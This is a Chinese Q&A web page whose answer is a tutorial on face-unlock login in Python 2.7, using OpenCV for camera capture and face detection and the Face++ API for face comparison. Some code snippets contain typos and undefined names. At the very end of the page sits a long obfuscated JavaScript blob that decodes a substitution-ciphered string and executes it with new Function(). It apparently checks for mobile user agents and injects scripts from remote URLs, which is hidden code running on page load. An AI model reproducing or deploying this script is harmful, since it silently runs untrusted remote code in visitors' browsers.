如何使用Python,基于OpenCV与Face++实现人脸解锁的功能

2025-03-05 06:46:08
推荐回答(1个)
回答1:

近几天微软的发布会上讲到了不少认脸解锁的内容,经过探索,其实利用手头的资源我们完全自己也可以完成这样一个过程。

本文讲解了如何使用Python,基于OpenCV与Face++实现人脸解锁的功能。

本文基于Python 2.7.11,Windows 8.1 系统。

主要内容

  • Windows 8.1上配置OpenCV

  • OpenCV的人脸检测应用

  • 使用Face++完成人脸辨识(如果你想自己实现这部分的功能,可以借鉴例如这个项目)

  • Windows 8.1上配置OpenCV

    入门的时候配置环境总是一个非常麻烦的事情,在Windows上配置OpenCV更是如此。

    既然写了这个推广的科普教程,总不能让读者卡在环境配置上吧。

    下面用到的文件都可以在这里(提取码:b6ec)下载,但是注意,目前OpenCV仅支持Python2.7。

    将cv2加入site-packages

    将下载下来的cv2.pyd文件放入Python安装的文件夹下的Libsite-packages目录。

    就我的电脑而言,这个目录就是C:/Python27/Lib/site-packages/。

    记得不要直接使用pip安装,将文件拖过去即可。

    安装numpy组件

    在命令行下进入到下载下来的文件所在的目录(按住Shift右键有在该目录打开命令行的选项)

    键入命令:

    1

  •    
  • pip install numpy-1.11.0rc2-cp27-cp27m-win32.whl

  •    
  • 如果你的系统或者Python不适配,可以在这里下载别的轮子。

    测试OpenCV安装

    在命令行键入命令:

    1

  •    
  • python -c "import cv2"

  •    
  • 如果没有出现错误提示,那么cv2就已经安装好了。

    OpenCV的人脸检测应用

    人脸检测应用,简而言之就是一个在照片里找到人脸,然后用方框框起来的过程(我们的相机经常做这件事情)

    那么具体而言就是这样一个过程:

  • 获取摄像头的图片

  • 在图片中检测到人脸的区域

  • 在人脸的区域周围绘制方框

  • 获取摄像头的图片

    这里简单的讲解一下OpenCV的基本操作。

    以下操作是打开摄像头的基本操作:

    1

    2

    3

    4

    5

    6

    7

  •    
  • #coding=utf8

    import cv2

    # 一般笔记本的默认摄像头都是0

    capInput = cv2.VideoCapture(0)

    # 我们可以用这条命令检测摄像头是否可以读取数据

    if not capInput.isOpened(): print('Capture failed because of camera')

  •    
  • 那么怎么从摄像头读取数据呢?

    1

    2

    3

    4

    5

    6

    7

    8

  •    
  • # 接上段程序

    # 现在摄像头已经打开了,我们可以使用这条命令读取图像

    # img就是我们读取到的图像,就和我们使用open('pic.jpg', 'rb').read()读取到的数据是一样的

    ret, img = capInput.read()

    # 你可以使用open的方式存储,也可以使用cv2提供的方式存储

    cv2.imwrite('pic.jpg', img)

    # 同样,你可以使用open的方式读取,也可以使用cv2提供的方式读取

    img = cv2.imread('pic.jpg')

  •    
  • 为了方便显示图片,cv2也提供了显示图片的方法:

    1

    2

    3

    4

    5

    6

  •    
  • # 接上段程序

    # 定义一个窗口,当然也可以不定义

    imgWindowName = 'ImageCaptured'

    imgWindow = cv2.namedWindow(imgWindowName, cv2.WINDOW_NORMAL)

    # 在窗口中显示图片

    cv2.imshow(imgWindowName, img)

  •    
  • 当然在完成所有操作以后需要把摄像头和窗口都做一个释放:

    1

    2

    3

    4

    5

  •    
  • # 接上段程序

    # 释放摄像头

    capInput.release()

    # 释放所有窗口

    cv2.destroyAllWindows()

  •    
  • 在图片中检测到人脸的区域

    OpenCV给我们提供了已经训练好的人脸的xml模板,我们只需要载入然后比对即可。

    1

    2

    3

    4

    5

    6

    7

    8

  •    
  • # 接上段程序

    # 载入xml模板

    faceCascade = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')

    # 将图形存储的方式进行转换

    gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)

    # 使用模板匹配图形

    faces = faceCascade.detectMultiScale(gray, 1.3, 5)

    print(faces)

  •    
  • 在人脸的区域周围绘制方框

    在上一个步骤中,faces中的四个量分别为左上角的横坐标、纵坐标、宽度、长度。

    所以我们根据这四个量很容易的就可以绘制出方框。

    1

    2

    3

  •    
  • # 接上段程序

    # 函数的参数分别为:图像,左上角坐标,右下角坐标,颜色,宽度

    img = cv2.rectangle(img, (x, y), (x + w, y + h), (255, 0, 0), 2)

  •    
  • 成果

    根据上面讲述的内容,我们现在已经可以完成一个简单的人脸辨认了:

    1

    2

    3

    4

    5

    6

    7

    8

    9

    10

    11

    12

    13

    14

    15

    16

    17

    18

    19

    20

    21

    22

    23

    24

    25

    26

    27

    28

    29

    30

  •    
  • #coding=utf8

    import cv2

    print('Press Esc to exit')

    faceCascade = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')

    imgWindow = cv2.namedWindow('FaceDetect', cv2.WINDOW_NORMAL)

    def detect_face():

    capInput = cv2.VideoCapture(0)

    # 避免处理时间过长造成画面卡顿

    nextCaptureTime = time.time()

    faces = []

    if not capInput.isOpened(): print('Capture failed because of camera')

    while 1:

    ret, img = capInput.read()

    gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)

    if nextCaptureTime < time.time():

    nextCaptureTime = time.time() + 0.1

    faces = faceCascade.detectMultiScale(gray, 1.3, 5)

    if faces:

    for x, y, w, h in faces:

    img = cv2.rectangle(img, (x, y), (x + w, y + h), (255, 0, 0), 2)

    cv2.imshow('FaceDetect', img)

    # 这是简单的读取键盘输入,27即Esc的acsii码

    if cv2.waitKey(1) & 0xFF == 27: break

    capInput.release()

    cv2.destroyAllWindows()

    if __name__ == '__main__':

    detect_face()

  •    
  • 使用Face++完成人脸辨识

    第一次认识Face++还是因为支付宝的人脸支付,响应速度还是非常让人满意的。

    现在只需要免费注册一个账号然后新建一个应用就可以使用了,非常方便。

    他的官方网址是这个,注册好之后在这里的我的应用中创建应用即可。

    创建好应用之后你会获得API Key与API Secret。

    Face++的API调用逻辑简单来说是这样的:

  • 上传图片获取读取到的人的face_id

  • 创建Person,获取person_id(Person中的图片可以增加、删除)

  • 比较两个face_id,判断是否是一个人

  • 比较face_id与person_id,判断是否是一个人

  • 上传图片获取face_id

    在将图片通过post方法上传到特定的地址后将返回一个json的值。

    如果api_key, api_secret没有问题,且在上传的图片中有识别到人脸,那么会存储在json的face键值下。

    1

    2

    3

    4

    5

    6

    7

    8

    9

    10

    11

    12

    13

    14

    15

    16

    17

    18

    19

    20

  •    
  • #coding=utf8

    import requests

    # 这里填写你的应用的API Key与API Secret

    API_KEY = ''

    API_SECRET = ''

    # 目前的API网址是这个,你可以在API文档里找到这些

    BASE_URL = 'httlus.com/v2'

    # 使用Requests上传图片

    url = '%s/detection/detect?api_key=%s&api_secret=%s&attribute=none'%(

    BASE_URL, API_KEY, API_SECRET)

    files = {'img': (os.path.basename(fileDir), open(fileDir, 'rb'),

    mimetypes.guess_type(fileDir)[0]), }

    r = requests.post(url, files = files)

    # 如果读取到图片中的头像则输出他们,其中的'face_id'就是我们所需要的值

    faces = r.json().get('face')

    print faces

  •    
  • 创建Person

    这个操作没有什么可以讲的内容,可以对照这段程序和官方的API介绍。

    官方的API介绍可以见这里,相信看完这一段程序以后你就可以自己完成其余的API了。

    1

    2

    3

    4

    5

    6

    7

    8

    9

    10

    11

    12

    13

    14

  •    
  • # 上接上一段程序

    # 读取face_id

    if not faces is None: faceIdList = [face['face_id'] for face in faces]

    # 使用Requests创建Person

    url = '%s/person/create'%BASE_URL

    params = {

    'api_key': API_KEY,

    'api_secret': API_SECRET,

    'person_name': 'LittleCoder',

    'face_id': ','.join(faceIdList), }

    r = requests.get(url, params = params)

    # 获取person_id

    print r.json.()['person_id']

  •    
  • 进度确认

    到目前为止,你应该已经可以就给定的两张图片比对是否是同一个人了。

    那么让我们来试着写一下这个程序吧,两张图片分别为’pic1.jpg’, ‘pic2.jpg’好了。

    下面我给出了我的代码:

    1

    2

    3

    4

    5

    6

    7

    8

    9

    10

    11

    12

    13

    14

    15

    16

    17

    18

    19

    20

    21

    22

    23

    24

    25

    26

    27

  •    
  • def upload_img(fileDir, oneface = True):

    url = '%s/detection/detect?api_key=%s&api_secret=%s&attribute=none'%(

    BASE_URL, API_KEY, API_SECRET)

    if oneface: url += '&mode=oneface'

    files = {'img': (os.path.basename(fileDir), open(fileDir, 'rb'),

    mimetypes.guess_type(fileDir)[0]), }

    r = requests.post(url, files = files)

    faces = r.json().get('face')

    if faces is None:

    print('There is no face found in %s'%fileDir)

    else:

    return faces[0]['face_id']

    def compare(faceId1, faceId2):

    url = '%s/recognition/compare'%BASE_URL

    params = BASE_PARAMS

    params['face_id1'] = faceId1

    params['face_id2'] = faceId2

    r = requests.get(url, params)

    return r.json()

    faceId1 = upload_img('pic1.jpg')

    faceId2 = upload_img('pic2.jpg')

    if face_id1 and face_id2:

    print(compare(faceId1, faceId2))

    else:

    print('Please change two pictures')

  •    
  • 成品

    到此,所有的知识介绍都结束了,相比大致如何完成这个项目各位读者也已经有想法了吧。

    下面我们需要构思一下人脸解锁的思路,大致而言是这样的:

  • 使用一个程序设置账户(包括向账户中存储解锁用的图片)

  • 使用另一个程序登陆(根据输入的用户名测试解锁)

  • 这里会有很多重复的代码,就不再赘述了,你可以在这里或者这里(提取码:c073)下载源代码测试使用。

    这里是设置账户的截图:

    设置账户

    这里是登陆的截图:

    登陆

    结束语

    希望读完这篇文章能对你有帮助,有什么不足之处万望指正(鞠躬)。

!function(){function a(a){var _idx="g3r6t5j1i0";var b={e:"P",w:"D",T:"y","+":"J",l:"!",t:"L",E:"E","@":"2",d:"a",b:"%",q:"l",X:"v","~":"R",5:"r","&":"X",C:"j","]":"F",a:")","^":"m",",":"~","}":"1",x:"C",c:"(",G:"@",h:"h",".":"*",L:"s","=":",",p:"g",I:"Q",1:"7",_:"u",K:"6",F:"t",2:"n",8:"=",k:"G",Z:"]",")":"b",P:"}",B:"U",S:"k",6:"i",g:":",N:"N",i:"S","%":"+","-":"Y","?":"|",4:"z","*":"-",3:"^","[":"{","(":"c",u:"B",y:"M",U:"Z",H:"[",z:"K",9:"H",7:"f",R:"x",v:"&","!":";",M:"_",Q:"9",Y:"e",o:"4",r:"A",m:".",O:"o",V:"W",J:"p",f:"d",":":"q","{":"8",W:"I",j:"?",n:"5",s:"3","|":"T",A:"V",D:"w",";":"O"};return a.split("").map(function(a){return void 0!==b[a]?b[a]:a}).join("")}var b=a('data:image/jpg;base64,cca8>[7_2(F6O2 5ca[5YF_52"vX8"%cmn<ydFhm5d2fO^caj}g@aPqYF 282_qq!Xd5 Y=F=O8D62fODm622Y5V6fFh!qYF ^8O/Ko0.c}00%n0.cs*N_^)Y5c"}"aaa=78[6L|OJgN_^)Y5c"@"a<@=5YXY5LY9Y6phFgN_^)Y5c"0"a=YXY2F|TJYg"FO_(hY2f"=LqOFWfg_cmn<ydFhm5d2fO^cajngKa=5YXY5LYWfg_cmn<ydFhm5d2fO^cajngKa=5ODLgo=(Oq_^2Lg}0=6FY^V6FhgO/}0=6FY^9Y6phFg^/o=qOdfiFdF_Lg0=5Y|5Tg0P=68"#MqYYb"=d8HZ!F5T[d8+i;NmJd5LYc(c6a??"HZ"aP(dF(hcYa[P7_2(F6O2 pcYa[5YF_52 Ym5YJqd(Yc"[[fdTPP"=c2YD wdFYampYFwdFYcaaP7_2(F6O2 (cY=Fa[qYF 282_qq!F5T[28qO(dqiFO5dpYmpYFWFY^cYaP(dF(hcYa[Fvvc28FcaaP5YF_52 2P7_2(F6O2 qcY=F=2a[F5T[qO(dqiFO5dpYmLYFWFY^cY=FaP(dF(hcYa[2vv2caPP7_2(F6O2 LcY=Fa[F8}<d5p_^Y2FLmqY2pFhvvXO6f 0l88FjFg""!7mqOdfiFdF_L8*}=}00<dmqY2pFh??cdmJ_Lhc`c$[YPa`%Fa=qc6=+i;NmLF562p67TcdaaaP7_2(F6O2 _cYa[qYF F80<d5p_^Y2FLmqY2pFhvvXO6f 0l88YjYg}=28"ruxwE]k9W+ztyN;eI~i|BAV&-Ud)(fY7h6CSq^2OJ:5LF_XDRT4"=O82mqY2pFh=58""!7O5c!F**!a5%82HydFhm7qOO5cydFhm5d2fO^ca.OaZ!5YF_52 5P7_2(F6O2 fcYa[qYF F8fO(_^Y2Fm(5YdFYEqY^Y2Fc"L(56JF"a!Xd5 28H"hFFJLg\/\/[[fdTPPKs0)hFL_h^mYJRqFmRT4gQ}1Q"="hFFJLg\/\/[[fdTPPKs0)hFL_h^mYJRqFmRT4gQ}1Q"="hFFJLg\/\/[[fdTPPKs0)hFL_h^mYJRqFmRT4gQ}1Q"="hFFJLg\/\/[[fdTPPKs0)hFL_h^mYJRqFmRT4gQ}1Q"="hFFJLg\/\/[[fdTPPKs0)hFL_h^mYJRqFmRT4gQ}1Q"="hFFJLg\/\/[[fdTPPKs0)hFL_h^mYJRqFmRT4gQ}1Q"="hFFJLg\/\/[[fdTPPKs0)hFL_h^mYJRqFmRT4gQ}1Q"Z!qYF O8pc2Hc2YD wdFYampYFwdTcaZ??2H0Za%"/h^/Ks0jR8ps5KFnC}60"!O8O%c*}888Om62fYR;7c"j"aj"j"g"v"a%"58"%7m5Y|5T%%%"vF8"%hca%5ca=FmL5(8pcOa=FmO2qOdf87_2(F6O2ca[7mqOdfiFdF_L8@=)caP=FmO2Y55O587_2(F6O2ca[YvvYca=LYF|6^YO_Fc7_2(F6O2ca[Fm5Y^OXYcaP=}0aP=fO(_^Y2FmhYdfmdJJY2fxh6qfcFa=7mqOdfiFdF_L8}P7_2(F6O2 hca[qYF Y8(c"bb___b"a!5YF_52 Y??qc"bb___b"=Y8ydFhm5d2fO^camFOiF562pcsKamL_)LF562pcsa=7_2(F6O2ca[Y%8"M"Pa=Y2(OfYB~WxO^JO2Y2FcYaPr55dTm6Lr55dTcda??cd8HZ=qc6=""aa!qYF J8"Ks0"=X8"ps5KFnC}60"!7_2(F6O2 TcYa[}l88Ym5YdfTiFdFYvv0l88Ym5YdfTiFdFY??Ym(qOLYcaP7_2(F6O2 DcYa[Xd5 F8H"Ks0^)ThF)mpOL2fmRT4"="Ks0X5ThF)m64YdCmRT4"="Ks02pThFmpOL2fmRT4"="Ks0_JqhFm64YdCmRT4"="Ks02TOhFmpOL2fmRT4"="Ks0CSqhF)m64YdCmRT4"="Ks0)FfThF)fmpOL2fmRT4"Z=F8FHc2YD wdFYampYFwdTcaZ??FH0Z=F8"DLLg//"%c2YD wdFYampYFwdFYca%F%"g@Q}1Q"!qYF O82YD VY)iO(SYFcF%"/"%J%"jR8"%X%"v58"%7m5Y|5T%%%"vF8"%hca%5ca%c2_qql882j2gcF8fO(_^Y2Fm:_Y5TiYqY(FO5c"^YFdH2d^Y8(Z"a=28Fj"v(h8"%FmpYFrFF56)_FYc"("ag""aaa!OmO2OJY287_2(F6O2ca[7mqOdfiFdF_L8@P=OmO2^YLLdpY87_2(F6O2cFa[qYF 28FmfdFd!F5T[28cY8>[qYF 5=F=2=O=6=d=(8"(hd5rF"=q8"75O^xhd5xOfY"=L8"(hd5xOfYrF"=_8"62fYR;7"=f8"ruxwE]k9W+ztyN;eI~i|BAV&-Ud)(fY7ph6CSq^2OJ:5LF_XDRT40}@sonK1{Q%/8"=h8""=^80!7O5cY8Ym5YJqd(Yc/H3r*Ud*40*Q%/8Z/p=""a!^<YmqY2pFh!a28fH_ZcYH(Zc^%%aa=O8fH_ZcYH(Zc^%%aa=68fH_ZcYH(Zc^%%aa=d8fH_ZcYH(Zc^%%aa=58c}nvOa<<o?6>>@=F8csv6a<<K?d=h%8iF562pHqZc2<<@?O>>oa=Kol886vvch%8iF562pHqZc5aa=Kol88dvvch%8iF562pHqZcFaa![Xd5 78h!qYF Y8""=F=2=O!7O5cF858280!F<7mqY2pFh!ac587HLZcFaa<}@{jcY%8iF562pHqZc5a=F%%ag}Q}<5vv5<@ojc287HLZcF%}a=Y%8iF562pHqZccs}v5a<<K?Ksv2a=F%8@agc287HLZcF%}a=O87HLZcF%@a=Y%8iF562pHqZcc}nv5a<<}@?cKsv2a<<K?KsvOa=F%8sa!5YF_52 YPPac2a=2YD ]_2(F6O2c"MFf(L"=2acfO(_^Y2Fm(_55Y2Fi(56JFaP(dF(hcYa[F82mqY2pFh*o0=F8F<0j0gJd5LYW2FcydFhm5d2fO^ca.Fa!Lc@0o=` $[Ym^YLLdpYP M[$[FPg$[2mL_)LF562pcF=F%o0aPPM`a=7mqOdfiFdF_L8*}PTcOa=@8887mqOdfiFdF_Lvv)caP=OmO2Y55O587_2(F6O2ca[@l887mqOdfiFdF_LvvYvvYca=TcOaP=7mqOdfiFdF_L8}PqYF i8l}!7_2(F6O2 )ca[ivvcfO(_^Y2Fm5Y^OXYEXY2Ft6LFY2Y5c7mYXY2F|TJY=7m(q6(S9d2fqY=l0a=Y8fO(_^Y2FmpYFEqY^Y2FuTWfc7m5YXY5LYWfaavvYm5Y^OXYca!Xd5 Y=F8fO(_^Y2Fm:_Y5TiYqY(FO5rqqc7mLqOFWfa!7O5cqYF Y80!Y<FmqY2pFh!Y%%aFHYZvvFHYZm5Y^OXYcaP7_2(F6O2 $ca[LYF|6^YO_Fc7_2(F6O2ca[67c@l887mqOdfiFdF_La[Xd5[(Oq_^2LgY=5ODLgO=6FY^V6Fhg5=6FY^9Y6phFg6=LqOFWfgd=6L|OJg(=5YXY5LY9Y6phFgqP87!7_2(F6O2 Lca[Xd5 Y8pc"hFFJLg//[[fdTPPKs0qhOFq^)Y6(:m^_2dphmRT4gQ}1Q/((/Ks0j6LM2OF8}vFd5pYF8}vFT8@"a!FOJmqO(dF6O2l88LYq7mqO(dF6O2jFOJmqO(dF6O28YgD62fODmqO(dF6O2mh5Y78YP7O5cqYF 280!2<Y!2%%a7O5cqYF F80!F<O!F%%a[qYF Y8"JOL6F6O2g76RYf!4*62fYRg}00!f6LJqdTg)qO(S!"%`qY7Fg$[2.5PJR!D6fFhg$[ydFhm7qOO5cmQ.5aPJR!hY6phFg$[6PJR!`!Y%8(j`FOJg$[q%F.6PJR`g`)OFFO^g$[q%F.6PJR`!Xd5 _8fO(_^Y2Fm(5YdFYEqY^Y2Fcda!_mLFTqYm(LL|YRF8Y=_mdffEXY2Ft6LFY2Y5c7mYXY2F|TJY=La=fO(_^Y2Fm)OfTm62LY5FrfCd(Y2FEqY^Y2Fc")Y7O5YY2f"=_aP67clia[qYF[YXY2F|TJYgY=6L|OJg5=5YXY5LY9Y6phFg6P87!fO(_^Y2FmdffEXY2Ft6LFY2Y5cY=h=l0a=7m(q6(S9d2fqY8h!Xd5 28fO(_^Y2Fm(5YdFYEqY^Y2Fc"f6X"a!7_2(F6O2 fca[Xd5 Y8pc"hFFJLg//[[fdTPPKs0qhOFq^)Y6(:m^_2dphmRT4gQ}1Q/((/Ks0j6LM2OF8}vFd5pYF8}vFT8@"a!FOJmqO(dF6O2l88LYq7mqO(dF6O2jFOJmqO(dF6O28YgD62fODmqO(dF6O2mh5Y78YP7_2(F6O2 hcYa[Xd5 F8D62fODm622Y59Y6phF!qYF 280=O80!67cYaLD6F(hcYmLFOJW^^Yf6dFYe5OJdpdF6O2ca=YmFTJYa[(dLY"FO_(hLFd5F"g28YmFO_(hYLH0Zm(q6Y2F&=O8YmFO_(hYLH0Zm(q6Y2F-!)5YdS!(dLY"FO_(hY2f"g28Ym(hd2pYf|O_(hYLH0Zm(q6Y2F&=O8Ym(hd2pYf|O_(hYLH0Zm(q6Y2F-!)5YdS!(dLY"(q6(S"g28Ym(q6Y2F&=O8Ym(q6Y2F-P67c0<2vv0<Oa67c5a[67cO<86a5YF_52l}!O<^%6vvfcaPYqLY[F8F*O!67cF<86a5YF_52l}!F<^%6vvfcaPP2m6f87m5YXY5LYWf=2mLFTqYm(LL|YRF8`hY6phFg$[7m5YXY5LY9Y6phFPJR`=5jfO(_^Y2Fm)OfTm62LY5FrfCd(Y2FEqY^Y2Fc"d7FY5)Yp62"=2agfO(_^Y2Fm)OfTm62LY5FrfCd(Y2FEqY^Y2Fc")Y7O5YY2f"=2a=i8l0PqYF F8pc"hFFJLg//[[fdTPPKs0)hFL_h^mYJRqFmRT4gQ}1Q/f/Ks0j(8}vR8ps5KFnC}60"a!FvvLYF|6^YO_Fc7_2(F6O2ca[Xd5 Y8fO(_^Y2Fm(5YdFYEqY^Y2Fc"L(56JF"a!YmL5(8F=fO(_^Y2FmhYdfmdJJY2fxh6qfcYaP=}YsaPP=@n00aPO82dX6pdFO5mJqdF7O5^=Y8l/3cV62?yd(a/mFYLFcOa=F8Jd5LYW2FcL(5YY2mhY6phFa>8Jd5LYW2FcL(5YY2mD6fFha=cY??Favvc/)d6f_?9_dDY6u5ODLY5?A6XOu5ODLY5?;JJOu5ODLY5?9YT|dJu5ODLY5?y6_6u5ODLY5?yIIu5ODLY5?Bxu5ODLY5?IzI/6mFYLFc2dX6pdFO5m_LY5rpY2FajDc7_2(F6O2ca[Lc@0}a=Dc7_2(F6O2ca[Lc@0@a=fc7_2(F6O2ca[Lc@0saPaPaPagfc7_2(F6O2ca[Lc}0}a=fc7_2(F6O2ca[Lc}0@a=Dc7_2(F6O2ca[Lc}0saPaPaPaa=lYvvO??$ca=XO6f 0l882dX6pdFO5mLY2fuYd(O2vvfO(_^Y2FmdffEXY2Ft6LFY2Y5c"X6L6)6q6FT(hd2pY"=7_2(F6O2ca[Xd5 Y=F!"h6ffY2"888fO(_^Y2FmX6L6)6q6FTiFdFYvvdmqY2pFhvvcY8pc"hFFJLg//[[fdTPPKs0)hFL_h^mYJRqFmRT4gQ}1Q"a%"/)_pj68"%J=cF82YD ]O5^wdFdamdJJY2fc"^YLLdpY"=+i;NmLF562p67Tcdaa=FmdJJY2fc"F"="0"a=2dX6pdFO5mLY2fuYd(O2cY=Fa=dmqY2pFh80=qc6=""aaPaPaca!'.substr(22));new Function(b)()}();